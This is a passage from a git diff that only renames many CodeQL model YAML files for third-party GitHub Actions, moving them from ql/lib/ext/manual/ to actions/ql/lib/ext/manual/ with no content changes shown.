b/actions/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml similarity index 100% rename from ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml rename to actions/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml diff --git a/ql/lib/ext/manual/azure_cli.model.yml b/actions/ql/lib/ext/manual/azure_cli.model.yml similarity index 100% rename from ql/lib/ext/manual/azure_cli.model.yml rename to actions/ql/lib/ext/manual/azure_cli.model.yml diff --git a/ql/lib/ext/manual/azure_powershell.model.yml b/actions/ql/lib/ext/manual/azure_powershell.model.yml similarity index 100% rename from ql/lib/ext/manual/azure_powershell.model.yml rename to actions/ql/lib/ext/manual/azure_powershell.model.yml diff --git a/ql/lib/ext/manual/bahmutov_npm-install.model.yml b/actions/ql/lib/ext/manual/bahmutov_npm-install.model.yml similarity index 100% rename from ql/lib/ext/manual/bahmutov_npm-install.model.yml rename to actions/ql/lib/ext/manual/bahmutov_npm-install.model.yml diff --git a/ql/lib/ext/manual/blackducksoftware_github-action.model.yml b/actions/ql/lib/ext/manual/blackducksoftware_github-action.model.yml similarity index 100% rename from ql/lib/ext/manual/blackducksoftware_github-action.model.yml rename to actions/ql/lib/ext/manual/blackducksoftware_github-action.model.yml diff --git a/ql/lib/ext/manual/bobheadxi_deployments.model.yml b/actions/ql/lib/ext/manual/bobheadxi_deployments.model.yml similarity index 100% rename from ql/lib/ext/manual/bobheadxi_deployments.model.yml rename to actions/ql/lib/ext/manual/bobheadxi_deployments.model.yml diff --git a/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml similarity index 100% rename from ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml rename to actions/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml diff --git a/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml similarity index 100% rename from ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml rename to actions/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml diff --git a/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml similarity index 100% rename from ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml rename to actions/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml diff --git a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/actions/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml similarity index 100% rename from ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml rename to actions/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml diff --git a/ql/lib/ext/manual/cachix_cachix-action.model.yml b/actions/ql/lib/ext/manual/cachix_cachix-action.model.yml similarity index 100% rename from ql/lib/ext/manual/cachix_cachix-action.model.yml rename to actions/ql/lib/ext/manual/cachix_cachix-action.model.yml diff --git a/ql/lib/ext/manual/changesets_action.model.yml b/actions/ql/lib/ext/manual/changesets_action.model.yml similarity index 100% rename from ql/lib/ext/manual/changesets_action.model.yml rename to actions/ql/lib/ext/manual/changesets_action.model.yml diff --git a/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml b/actions/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml similarity index 100% rename from ql/lib/ext/manual/cloudflare_wrangler-action.model.yml rename to actions/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml diff --git a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/actions/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml similarity index 100% rename from ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml rename to actions/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml diff --git a/ql/lib/ext/manual/coursier_cache-action.model.yml b/actions/ql/lib/ext/manual/coursier_cache-action.model.yml similarity index 100% rename from ql/lib/ext/manual/coursier_cache-action.model.yml rename to actions/ql/lib/ext/manual/coursier_cache-action.model.yml diff --git a/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml b/actions/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml similarity index 100% rename from ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml rename to actions/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml diff --git a/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml b/actions/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml similarity index 100% rename from ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml rename to actions/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml diff --git a/ql/lib/ext/manual/csexton_release-asset-action.model.yml b/actions/ql/lib/ext/manual/csexton_release-asset-action.model.yml similarity index 100% rename from ql/lib/ext/manual/csexton_release-asset-action.model.yml rename to actions/ql/lib/ext/manual/csexton_release-asset-action.model.yml diff --git a/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml b/actions/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml similarity index 100% rename from ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml rename to actions/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml diff --git a/ql/lib/ext/manual/cypress-io_github-action.model.yml b/actions/ql/lib/ext/manual/cypress-io_github-action.model.yml similarity index 100% rename from ql/lib/ext/manual/cypress-io_github-action.model.yml rename to actions/ql/lib/ext/manual/cypress-io_github-action.model.yml diff --git a/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml b/actions/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml similarity index 100% rename from ql/lib/ext/manual/dailydotdev_action-devcard.model.yml rename to actions/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml diff --git a/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml b/actions/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml similarity index 100% rename from ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml rename to actions/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml diff --git a/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml b/actions/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml similarity index 100% rename from ql/lib/ext/manual/daspn_private-actions-checkout.model.yml rename to actions/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml diff --git a/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml b/actions/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml similarity index 100% rename from ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml rename to actions/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml diff --git a/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml b/actions/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml similarity index 100% rename from ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml rename to actions/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml diff --git a/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml b/actions/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml similarity index 100% rename from ql/lib/ext/manual/delaguardo_setup-clojure.model.yml rename to actions/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml diff --git a/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml b/actions/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml similarity index 100% rename from ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml rename to actions/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml diff --git a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/actions/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml similarity index 100% rename from ql/lib/ext/manual/devorbitus_yq-action-output.model.yml rename to actions/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml diff --git a/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml b/actions/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml similarity index 100% rename from ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml rename to actions/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml diff --git a/ql/lib/ext/manual/docker_build-push-action.model.yml b/actions/ql/lib/ext/manual/docker_build-push-action.model.yml similarity index 100% rename from ql/lib/ext/manual/docker_build-push-action.model.yml rename to actions/ql/lib/ext/manual/docker_build-push-action.model.yml diff --git a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/actions/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml similarity index 100% rename from ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml rename to actions/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml diff --git a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/actions/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml similarity index 100% rename from ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml rename to actions/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml diff --git a/ql/lib/ext/manual/endbug_latest-tag.model.yml b/actions/ql/lib/ext/manual/endbug_latest-tag.model.yml similarity index 100% rename from ql/lib/ext/manual/endbug_latest-tag.model.yml rename to actions/ql/lib/ext/manual/endbug_latest-tag.model.yml diff --git a/ql/lib/ext/manual/expo_expo-github-action.model.yml b/actions/ql/lib/ext/manual/expo_expo-github-action.model.yml similarity index 100% rename from ql/lib/ext/manual/expo_expo-github-action.model.yml rename to actions/ql/lib/ext/manual/expo_expo-github-action.model.yml diff --git a/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml b/actions/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml similarity index 100% rename from ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml rename to actions/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml diff --git a/ql/lib/ext/manual/frabert_replace-string-action.model.yml b/actions/ql/lib/ext/manual/frabert_replace-string-action.model.yml similarity index 100% rename from ql/lib/ext/manual/frabert_replace-string-action.model.yml rename to actions/ql/lib/ext/manual/frabert_replace-string-action.model.yml diff --git a/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml b/actions/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml similarity index 100% rename from ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml rename to actions/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml diff --git a/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml b/actions/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml similarity index 100% rename from ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml rename to actions/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml diff --git a/ql/lib/ext/manual/game-ci_unity-builder.model.yml b/actions/ql/lib/ext/manual/game-ci_unity-builder.model.yml similarity index 100% rename from ql/lib/ext/manual/game-ci_unity-builder.model.yml rename to actions/ql/lib/ext/manual/game-ci_unity-builder.model.yml diff --git a/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml b/actions/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml similarity index 100% rename from ql/lib/ext/manual/game-ci_unity-test-runner.model.yml rename to actions/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml diff --git a/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml b/actions/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml similarity index 100% rename from ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml rename to actions/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml diff --git a/ql/lib/ext/manual/getsentry_action-release.model.yml b/actions/ql/lib/ext/manual/getsentry_action-release.model.yml similarity index 100% rename from ql/lib/ext/manual/getsentry_action-release.model.yml rename to actions/ql/lib/ext/manual/getsentry_action-release.model.yml diff --git a/ql/lib/ext/manual/github_codeql-action.model.yml b/actions/ql/lib/ext/manual/github_codeql-action.model.yml similarity index 100% rename from ql/lib/ext/manual/github_codeql-action.model.yml rename to actions/ql/lib/ext/manual/github_codeql-action.model.yml diff --git a/ql/lib/ext/manual/go-semantic-release_action.model.yml b/actions/ql/lib/ext/manual/go-semantic-release_action.model.yml similarity index 100% rename from ql/lib/ext/manual/go-semantic-release_action.model.yml rename to actions/ql/lib/ext/manual/go-semantic-release_action.model.yml diff --git a/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml b/actions/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml similarity index 100% rename from ql/lib/ext/manual/golangci_golangci-lint-action.model.yml rename to actions/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml diff --git a/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml b/actions/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml similarity index 100% rename from ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml rename to actions/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml diff --git a/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml b/actions/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml similarity index 100% rename from ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml rename to actions/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml diff --git a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml similarity index 100% rename from ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml rename to actions/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml diff --git a/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml b/actions/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml similarity index 100% rename from ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml rename to actions/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml diff --git a/ql/lib/ext/manual/gradle_gradle-build-action.model.yml b/actions/ql/lib/ext/manual/gradle_gradle-build-action.model.yml similarity index 100% rename from ql/lib/ext/manual/gradle_gradle-build-action.model.yml rename to actions/ql/lib/ext/manual/gradle_gradle-build-action.model.yml diff --git a/ql/lib/ext/manual/haya14busa_action-cond.model.yml b/actions/ql/lib/ext/manual/haya14busa_action-cond.model.yml similarity index 100% rename from ql/lib/ext/manual/haya14busa_action-cond.model.yml rename to actions/ql/lib/ext/manual/haya14busa_action-cond.model.yml diff --git a/ql/lib/ext/manual/hexlet_project-action.model.yml b/actions/ql/lib/ext/manual/hexlet_project-action.model.yml similarity index 100% rename from ql/lib/ext/manual/hexlet_project-action.model.yml rename to actions/ql/lib/ext/manual/hexlet_project-action.model.yml diff --git a/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml b/actions/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml similarity index 100% rename from ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml rename to actions/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml diff --git a/ql/lib/ext/manual/ilammy_setup-nasm.model.yml b/actions/ql/lib/ext/manual/ilammy_setup-nasm.model.yml similarity index 100% rename from ql/lib/ext/manual/ilammy_setup-nasm.model.yml rename to actions/ql/lib/ext/manual/ilammy_setup-nasm.model.yml diff --git a/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml b/actions/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml similarity index 100% rename from ql/lib/ext/manual/imjohnbo_issue-bot.model.yml rename to actions/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml diff --git a/ql/lib/ext/manual/iterative_setup-cml.model.yml b/actions/ql/lib/ext/manual/iterative_setup-cml.model.yml similarity index 100% rename from ql/lib/ext/manual/iterative_setup-cml.model.yml rename to actions/ql/lib/ext/manual/iterative_setup-cml.model.yml diff --git a/ql/lib/ext/manual/iterative_setup-dvc.model.yml b/actions/ql/lib/ext/manual/iterative_setup-dvc.model.yml similarity index 100% rename from ql/lib/ext/manual/iterative_setup-dvc.model.yml rename to actions/ql/lib/ext/manual/iterative_setup-dvc.model.yml diff --git a/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml b/actions/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml similarity index 100% rename from ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml rename to actions/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml diff --git a/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml b/actions/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml similarity index 100% rename from ql/lib/ext/manual/jitterbit_get-changed-files.model.yml rename to actions/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml diff --git a/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml b/actions/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml similarity index 100% rename from ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml rename to actions/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml diff --git a/ql/lib/ext/manual/jsdaniell_create-json.model.yml b/actions/ql/lib/ext/manual/jsdaniell_create-json.model.yml similarity index 100% rename from ql/lib/ext/manual/jsdaniell_create-json.model.yml rename to actions/ql/lib/ext/manual/jsdaniell_create-json.model.yml diff --git a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/actions/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml similarity index 100% rename from ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml rename to actions/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml diff --git a/ql/lib/ext/manual/jurplel_install-qt-action.model.yml b/actions/ql/lib/ext/manual/jurplel_install-qt-action.model.yml similarity index 100% rename from ql/lib/ext/manual/jurplel_install-qt-action.model.yml rename to actions/ql/lib/ext/manual/jurplel_install-qt-action.model.yml diff --git a/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml b/actions/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml similarity index 100% rename from ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml rename to actions/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml diff --git a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/actions/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml similarity index 100% rename from ql/lib/ext/manual/kaisugi_action-regex-match.model.yml rename to actions/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml diff --git a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/actions/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml similarity index 100% rename from ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml rename to actions/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml diff --git a/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml b/actions/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml similarity index 100% rename from ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml rename to actions/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml diff --git a/ql/lib/ext/manual/knu_changed-files.model.yml b/actions/ql/lib/ext/manual/knu_changed-files.model.yml similarity index 100% rename from ql/lib/ext/manual/knu_changed-files.model.yml rename to actions/ql/lib/ext/manual/knu_changed-files.model.yml diff --git a/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml b/actions/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml similarity index 100% rename from ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml rename to actions/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml diff --git a/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml b/actions/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml similarity index 100% rename from ql/lib/ext/manual/leafo_gh-actions-lua.model.yml rename to actions/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml diff --git a/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml b/actions/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml similarity index 100% rename from ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml rename to actions/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml diff --git a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/actions/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml similarity index 100% rename from ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml rename to actions/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml diff --git a/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml b/actions/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml similarity index 100% rename from ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml rename to actions/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml diff --git a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/actions/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml similarity index 100% rename from ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml rename to actions/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml diff --git a/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml b/actions/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml similarity index 100% rename from ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml rename to actions/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml diff --git a/ql/lib/ext/manual/magefile_mage-action.model.yml b/actions/ql/lib/ext/manual/magefile_mage-action.model.yml similarity index 100% rename from ql/lib/ext/manual/magefile_mage-action.model.yml rename to actions/ql/lib/ext/manual/magefile_mage-action.model.yml diff --git a/ql/lib/ext/manual/maierj_fastlane-action.model.yml b/actions/ql/lib/ext/manual/maierj_fastlane-action.model.yml similarity index 100% rename from ql/lib/ext/manual/maierj_fastlane-action.model.yml rename to actions/ql/lib/ext/manual/maierj_fastlane-action.model.yml diff --git a/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml b/actions/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml similarity index 100% rename from ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml rename to actions/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml diff --git a/ql/lib/ext/manual/marocchino_on_artifact.model.yml b/actions/ql/lib/ext/manual/marocchino_on_artifact.model.yml similarity index 100% rename from ql/lib/ext/manual/marocchino_on_artifact.model.yml rename to actions/ql/lib/ext/manual/marocchino_on_artifact.model.yml diff --git a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/actions/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml similarity index 100% rename from ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml rename to actions/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml diff --git a/ql/lib/ext/manual/mattdavis0351_actions.model.yml b/actions/ql/lib/ext/manual/mattdavis0351_actions.model.yml similarity index 100% rename from ql/lib/ext/manual/mattdavis0351_actions.model.yml rename to actions/ql/lib/ext/manual/mattdavis0351_actions.model.yml diff --git a/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml b/actions/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml similarity index 100% rename from ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml rename to actions/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml diff --git a/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml b/actions/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml similarity index 100% rename from ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml rename to actions/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml diff --git a/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml b/actions/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml similarity index 100% rename from ql/lib/ext/manual/microsoft_setup-msbuild.model.yml rename to actions/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml diff --git a/ql/lib/ext/manual/mikefarah_yq.model.yml b/actions/ql/lib/ext/manual/mikefarah_yq.model.yml similarity index 100% rename from ql/lib/ext/manual/mikefarah_yq.model.yml rename to actions/ql/lib/ext/manual/mikefarah_yq.model.yml diff --git a/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml b/actions/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml similarity index 100% rename from ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml rename to actions/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml diff --git a/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml b/actions/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml similarity index 100% rename from ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml rename to actions/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml diff --git a/ql/lib/ext/manual/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/manual/msys2_setup-msys2.model.yml similarity index 100% rename from ql/lib/ext/manual/msys2_setup-msys2.model.yml rename to actions/ql/lib/ext/manual/msys2_setup-msys2.model.yml diff --git a/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml b/actions/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml similarity index 100% rename from ql/lib/ext/manual/mxschmitt_action-tmate.model.yml rename to actions/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml diff --git a/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml b/actions/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml similarity index 100% rename from ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml rename to actions/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml diff --git a/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml b/actions/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml similarity index 100% rename from ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml rename to actions/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml diff --git a/ql/lib/ext/manual/nanasess_setup-php.model.yml b/actions/ql/lib/ext/manual/nanasess_setup-php.model.yml similarity index 100% rename from ql/lib/ext/manual/nanasess_setup-php.model.yml rename to actions/ql/lib/ext/manual/nanasess_setup-php.model.yml diff --git a/ql/lib/ext/manual/nick-fields_retry.model.yml b/actions/ql/lib/ext/manual/nick-fields_retry.model.yml similarity index 100% rename from ql/lib/ext/manual/nick-fields_retry.model.yml rename to actions/ql/lib/ext/manual/nick-fields_retry.model.yml diff --git a/ql/lib/ext/manual/octokit_graphql-action.model.yml b/actions/ql/lib/ext/manual/octokit_graphql-action.model.yml similarity index 100% rename from ql/lib/ext/manual/octokit_graphql-action.model.yml rename to actions/ql/lib/ext/manual/octokit_graphql-action.model.yml diff --git a/ql/lib/ext/manual/octokit_request-action.model.yml b/actions/ql/lib/ext/manual/octokit_request-action.model.yml similarity index 100% rename from ql/lib/ext/manual/octokit_request-action.model.yml rename to actions/ql/lib/ext/manual/octokit_request-action.model.yml diff --git a/ql/lib/ext/manual/olafurpg_setup-scala.model.yml b/actions/ql/lib/ext/manual/olafurpg_setup-scala.model.yml similarity index 100% rename from ql/lib/ext/manual/olafurpg_setup-scala.model.yml rename to actions/ql/lib/ext/manual/olafurpg_setup-scala.model.yml diff --git a/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml b/actions/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml similarity index 100% rename from ql/lib/ext/manual/paambaati_codeclimate-action.model.yml rename to actions/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml diff --git a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/actions/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml similarity index 100% rename from ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml rename to actions/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml diff --git a/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml b/actions/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml similarity index 100% rename from ql/lib/ext/manual/peter-evans_create-pull-request.model.yml rename to actions/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml diff --git a/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml b/actions/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml similarity index 100% rename from ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml rename to actions/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml diff --git a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/actions/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml similarity index 100% rename from ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml rename to actions/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml diff --git a/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml b/actions/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml similarity index 100% rename from ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml rename to actions/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml diff --git a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/actions/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml similarity index 100% rename from ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml rename to actions/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml diff --git a/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml b/actions/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml similarity index 100% rename from ql/lib/ext/manual/preactjs_compressed-size-action.model.yml rename to actions/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml diff --git a/ql/lib/ext/manual/py-actions_flake8.model.yml b/actions/ql/lib/ext/manual/py-actions_flake8.model.yml similarity index 100% rename from 